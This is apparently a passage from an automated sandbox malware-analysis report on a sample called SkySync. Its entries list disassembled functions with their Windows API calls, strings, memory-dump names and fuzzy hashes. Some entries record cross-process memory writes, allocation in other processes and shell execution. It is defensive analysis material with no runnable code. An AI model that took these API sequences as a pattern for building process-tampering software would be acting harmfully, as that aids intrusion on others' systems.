Instruction ID: e2fcb1282dcb748666ee860062eb83224a804ce8ed3ff5044463e6ec3136b5fe
Opcode Fuzzy Hash: 6a03b236a89cfbb953baf3968018ae201a19d2e9a7b25ec6898a1ddc79006c59
Instruction Fuzzy Hash: 285102322083049BCB25EFA8D9456BBB7E8AF55362F04062DFA91D71D1DB70CE44CB52

Function 00B0FB07 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00B0FC3F
GetProcessId.KERNEL32(00000000), ref: 00B0FCB6
CloseHandle.KERNEL32(00000000), ref: 00B0FCE5

Strings

@, xrefs: 00B0FC0E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell
String ID: @
API String ID: 1279613386-2766056989
Opcode ID: e10332c63eff7fe48f652849a8e5eb073d810e52f5cdd0f09276cac87d586a6e
Instruction ID: a3bb6f69764dd8380c0671475b45a648aced0f2acc7f3524e55f8b0c8a3963cd
Opcode Fuzzy Hash: e10332c63eff7fe48f652849a8e5eb073d810e52f5cdd0f09276cac87d586a6e
Instruction Fuzzy Hash: F6619E75A006199FCF24EF64C5919AEBBF5FF48314F1084A9E816AB791DB30AD42CF90

Function 00AB0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00AB0690
#, xrefs: 00AB0699

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: d0640617af832a8fc77e67ec0907313a641128c319ab05cf017bac5b769edddc
Instruction ID: 80d481e4d32213a88d805347e6c0d01bc7cbf71493de870e223353da654d3e5b
Opcode Fuzzy Hash: d0640617af832a8fc77e67ec0907313a641128c319ab05cf017bac5b769edddc
Instruction Fuzzy Hash: 7F512575500285DFDF25EF69C840AFABBB8FF65310F144455EC929B291DB34AC82CB60

Function 00AEA3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AE9E4E,?,?,00000034,00000800,?,00000034), ref: 00AF1CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AEA3F7

Part of subcall function 00AF1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AE9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00AF1CB0

Part of subcall function 00AF1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00AF1C08
Part of subcall function 00AF1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AE9E12,00000034,?,?,00001004,00000000,00000000), ref: 00AF1C18
Part of subcall function 00AF1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AE9E12,00000034,?,?,00001004,00000000,00000000), ref: 00AF1C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AEA464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AEA4B1

Strings

@, xrefs: 00AEA4C9

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 30439d0ed13c9d27b6f9df6d251b54d1279414522541d679f8720531d7f5a455
Instruction ID: 47c8f41b98f34e09594c8f3e4950466510ca9d1106cda8215638e44ad2b3b2de
Opcode Fuzzy Hash: 30439d0ed13c9d27b6f9df6d251b54d1279414522541d679f8720531d7f5a455
Instruction Fuzzy Hash: 19415D7290121CBFDB20DFA4CD85AEEBBB8EF49300F004095FA55B7181DA706E85CBA1

Function 00AF2EFA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00AF2F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00AF2FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B57890,00000000), ref: 00AF3012

Strings

0, xrefs: 00AF2F5C

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 11cf38161599bd6ec07a6707797d5fb0f0ea317870dab051ee84599bc14c1723
Instruction ID: 81c4321e2687b8a8d9ca9a7a2678401e682f783f794f44dc08d5544b67c5b095
Opcode Fuzzy Hash: 11cf38161599bd6ec07a6707797d5fb0f0ea317870dab051ee84599bc14c1723
Instruction Fuzzy Hash: 6B41D5722043459FDB20DF64C885B6ABBE8EF85310F10461EFAA5973D1DB70EA05CB52

Function 00AF3B64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AF3B8A,?), ref: 00AF4BE0

Part of subcall function 00AF4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AF3B8A,?), ref: 00AF4BF9

lstrcmpiW.KERNEL32(?,?), ref: 00AF3BAA
MoveFileW.KERNEL32(?,?), ref: 00AF3BDE
SHFileOperationW.SHELL32(?), ref: 00AF3C92

Strings

\*.*, xrefs: 00AF3C20

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FileFullNamePath$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 67141772-1173974218
Opcode ID: 0da791493984233fb5004e31628ca651d6d19cbe191c1714c2988ff6d70e8e23
Instruction ID: ec10f5e16c50ed1521f9c4f3589479700d4e1c5cc4c2c796e404fdb701bef361
Opcode Fuzzy Hash: 0da791493984233fb5004e31628ca651d6d19cbe191c1714c2988ff6d70e8e23
Instruction Fuzzy Hash: FD41827250C3489ACB52EFA4C585AEFB7ECAF89340F40192EF589C3152EB34D689C752

Function 00B17F6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B20980,00000000,?,?,?,?), ref: 00B18004
GetWindowLongW.USER32 ref: 00B18021
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B18031

Strings

SysTreeView32, xrefs: 00B17FD6

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e0306475e1449e8dbac7ee136d45c31b96641492dd75be8bd0d8cff1f7a4f605
Instruction ID: 3d1ad3fd3565a445978ea0f4319f1119dab409d43a08596500edb9d1a2abb0fb
Opcode Fuzzy Hash: e0306475e1449e8dbac7ee136d45c31b96641492dd75be8bd0d8cff1f7a4f605
Instruction Fuzzy Hash: 7831CE31254209AFDF219E34CC45BEA7BE9FB49324F204725F975932E1DB31AC918B50

Function 00B179FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B17A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B17A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B17ABE

Strings

SysMonthCal32, xrefs: 00B17A51

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 928c1e0fce934719dbadccdd51173ba51c50861a6ad63c1dbd00b76519c3dbc2
Instruction ID: 26d8f4af3061fb632360424414c5af1ef243fc57e9efe2ea719a02020606db20
Opcode Fuzzy Hash: 928c1e0fce934719dbadccdd51173ba51c50861a6ad63c1dbd00b76519c3dbc2
Instruction Fuzzy Hash: 4621D332650218BFDF258F50CC82FEE3BB9EF48714F110254FE146B190DA71AD918B90

Function 00B181B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B1826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B1827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B18284

Strings

msctls_updown32, xrefs: 00B181E9

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: cc22b151f9a2b497c5f1324f174cf53e88cd8c481a95b216fca4be8885c23df1
Instruction ID: 31a78dbf6bc8899788736967453ecd2b052b4409563733db5f5541cbd52c499a
Opcode Fuzzy Hash: cc22b151f9a2b497c5f1324f174cf53e88cd8c481a95b216fca4be8885c23df1
Instruction Fuzzy Hash: 11217CB1604209AFDB11DF54DC85EA737EDEB4A354B540099FA019B261CF71EC51CBA0

Function 00B172D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B17360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B17370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B17395

Strings

Listbox, xrefs: 00B1732D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a004faecda63be6b7c312fa0356eeb2913fb78c15f059ef3d5709d33402d168f
Instruction ID: b65ff3ed5d48aaa2576d2539e3376ddb65b5da1f117d468cb17d22e78712bf14
Opcode Fuzzy Hash: a004faecda63be6b7c312fa0356eeb2913fb78c15f059ef3d5709d33402d168f
Instruction Fuzzy Hash: 0121D032254108BFDF128F54DC85EFF3BBAEB89750F508164F9109B1A0CA71AC929BA0

Function 00AFB283 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AFB297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AFB2EB
SetErrorMode.KERNEL32(00000000,00000001,00000000,00B20980), ref: 00AFB342

Strings

%lu, xrefs: 00AFB2FE

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: b4198067ce6272ed7c1a58b5ec13f10404ea7321ed3f340cfbb98a3bb65c139d
Instruction ID: cf3c46f2e13a8c87cdd548a241fe13f9488c7720f4bf6fc2c7151f7803e790ae
Opcode Fuzzy Hash: b4198067ce6272ed7c1a58b5ec13f10404ea7321ed3f340cfbb98a3bb65c139d
Instruction Fuzzy Hash: BE214135A00109AFCB10EFA5C985DAEB7F8EF89714B104169F905EB252DB31EA46CB61

Function 00AEAC05 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AEAA6F
Part of subcall function 00AEAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AEAA82
Part of subcall function 00AEAA52: GetCurrentThreadId.KERNEL32 ref: 00AEAA89
Part of subcall function 00AEAA52: AttachThreadInput.USER32(00000000), ref: 00AEAA90

GetFocus.USER32 ref: 00AEAC2A

Part of subcall function 00AEAA9B: GetParent.USER32(?), ref: 00AEAAA9

GetClassNameW.USER32(?,?,00000100), ref: 00AEAC73
EnumChildWindows.USER32(?,00AEACEB), ref: 00AEAC9B

Strings

%s%d, xrefs: 00AEACAF

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
String ID: %s%d
API String ID: 2776554818-1110647743
Opcode ID: 5d2ce3086647651ffad3158e7057dc638604638709f1448ebdc8a30aeba9f31b
Instruction ID: 124b77077a6d8d5df105616aa2de3681b26bbe719fc273e9771ce9a403dd77b6
Opcode Fuzzy Hash: 5d2ce3086647651ffad3158e7057dc638604638709f1448ebdc8a30aeba9f31b
Instruction Fuzzy Hash: 4511DF75200204BBCF11BFA19E85FEA37ACAB98300F108075FE08AB183CB7469459B72

Function 00B17D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B17D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B17DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B17DB9

Strings

msctls_trackbar32, xrefs: 00B17D6E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: a49f83572f809b12105c9b8c3df81d9ccf3d2c2d55d298cdaa424c503dd06f98
Instruction ID: b0d83de94dcdea0cc52e36d100d74f37e1f336bdf60eba80c26c7fb06140f520
Opcode Fuzzy Hash: a49f83572f809b12105c9b8c3df81d9ccf3d2c2d55d298cdaa424c503dd06f98
Instruction Fuzzy Hash: D711E3B2284208BADF249F64DC45FEB7BE9EF89B14F11452CFA41A7090DA719851DB20

Function 00AB329B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00AB32DA,00AB1003,?,00AB9EEE,000000FF,0000001E,00B4CE28,00000008,00AB9E52,00AB1003,00AB1003), ref: 00AB32AA
GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00AB32BC

Strings

mscoree.dll, xrefs: 00AB32A3
CorExitProcess, xrefs: 00AB32B4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 7e9f4320c61ad708ee6860d54a26ff91268889a6731fe0e8a4703680adfecd9a
Instruction ID: 5acdb4f6e5ca2af48032261fa8699795011679f98f2b752c56681d14769a57c7
Opcode Fuzzy Hash: 7e9f4320c61ad708ee6860d54a26ff91268889a6731fe0e8a4703680adfecd9a
Instruction Fuzzy Hash: 00D01731694208BBDF11AFA1ED06BE97AECBF04B92F4001A4B818E20A1DF619B109664

Function 00B0C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AD027A,?), ref: 00B0C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B0C6F9

Strings

kernel32.dll, xrefs: 00B0C6E2
GetSystemWow64DirectoryW, xrefs: 00B0C6F3

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: beb884147ea262750cb9503fb52c5615c2ae4fb597025311590b3d748c054fec
Instruction ID: 0cc74028e2e7d9001c039abf40cd0c903a23b7b01d2f8621bf5a09e24092ffb6
Opcode Fuzzy Hash: beb884147ea262750cb9503fb52c5615c2ae4fb597025311590b3d748c054fec
Instruction Fuzzy Hash: C8E0EC79520712DBD7706B29D849F567ED4EF04755B6085A9E889D22A1DB70DC80CB10

Function 00AA4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4AF7,?), ref: 00AA4BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4BCA

Strings

Wow64RevertWow64FsRedirection, xrefs: 00AA4BC4
kernel32.dll, xrefs: 00AA4BB3

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: bdffa3f8a2c98235585de7132ec6b36ce99ce83fad4609f63e963a8f82e187f0
Instruction ID: e945832be3dffa93d9dd9259e4d216166ce4a55e5edf7d511936bc9e12a92a26
Opcode Fuzzy Hash: bdffa3f8a2c98235585de7132ec6b36ce99ce83fad4609f63e963a8f82e187f0
Instruction Fuzzy Hash: A1D01270560712CFD7306F35DC0874676D5AF09351B119C6AE486D75A5DFB0D490C750

Function 00AA4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4B44,?,00AA49D4,?,?,00AA27AF,?,00000001), ref: 00AA4B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4B97

Strings

kernel32.dll, xrefs: 00AA4B80
Wow64DisableWow64FsRedirection, xrefs: 00AA4B91

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 7da4c1e600efc8cc2bbb952e1e6991ffdb9a30778c8968fbd61776a2b5f8e816
Instruction ID: 0a4c77a26c5369816553f6825a389882e51ec8d616b2230ec0c8b7f2268b7d5a
Opcode Fuzzy Hash: 7da4c1e600efc8cc2bbb952e1e6991ffdb9a30778c8968fbd61776a2b5f8e816
Instruction Fuzzy Hash: 33D01270520712CFD7306F35EC18B4676D4AF09351F118879E486E35A1DBB0D480D710

Function 00B11447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00B11696), ref: 00B11455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B11467

Strings

advapi32.dll, xrefs: 00B11450
RegDeleteKeyExW, xrefs: 00B11461

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
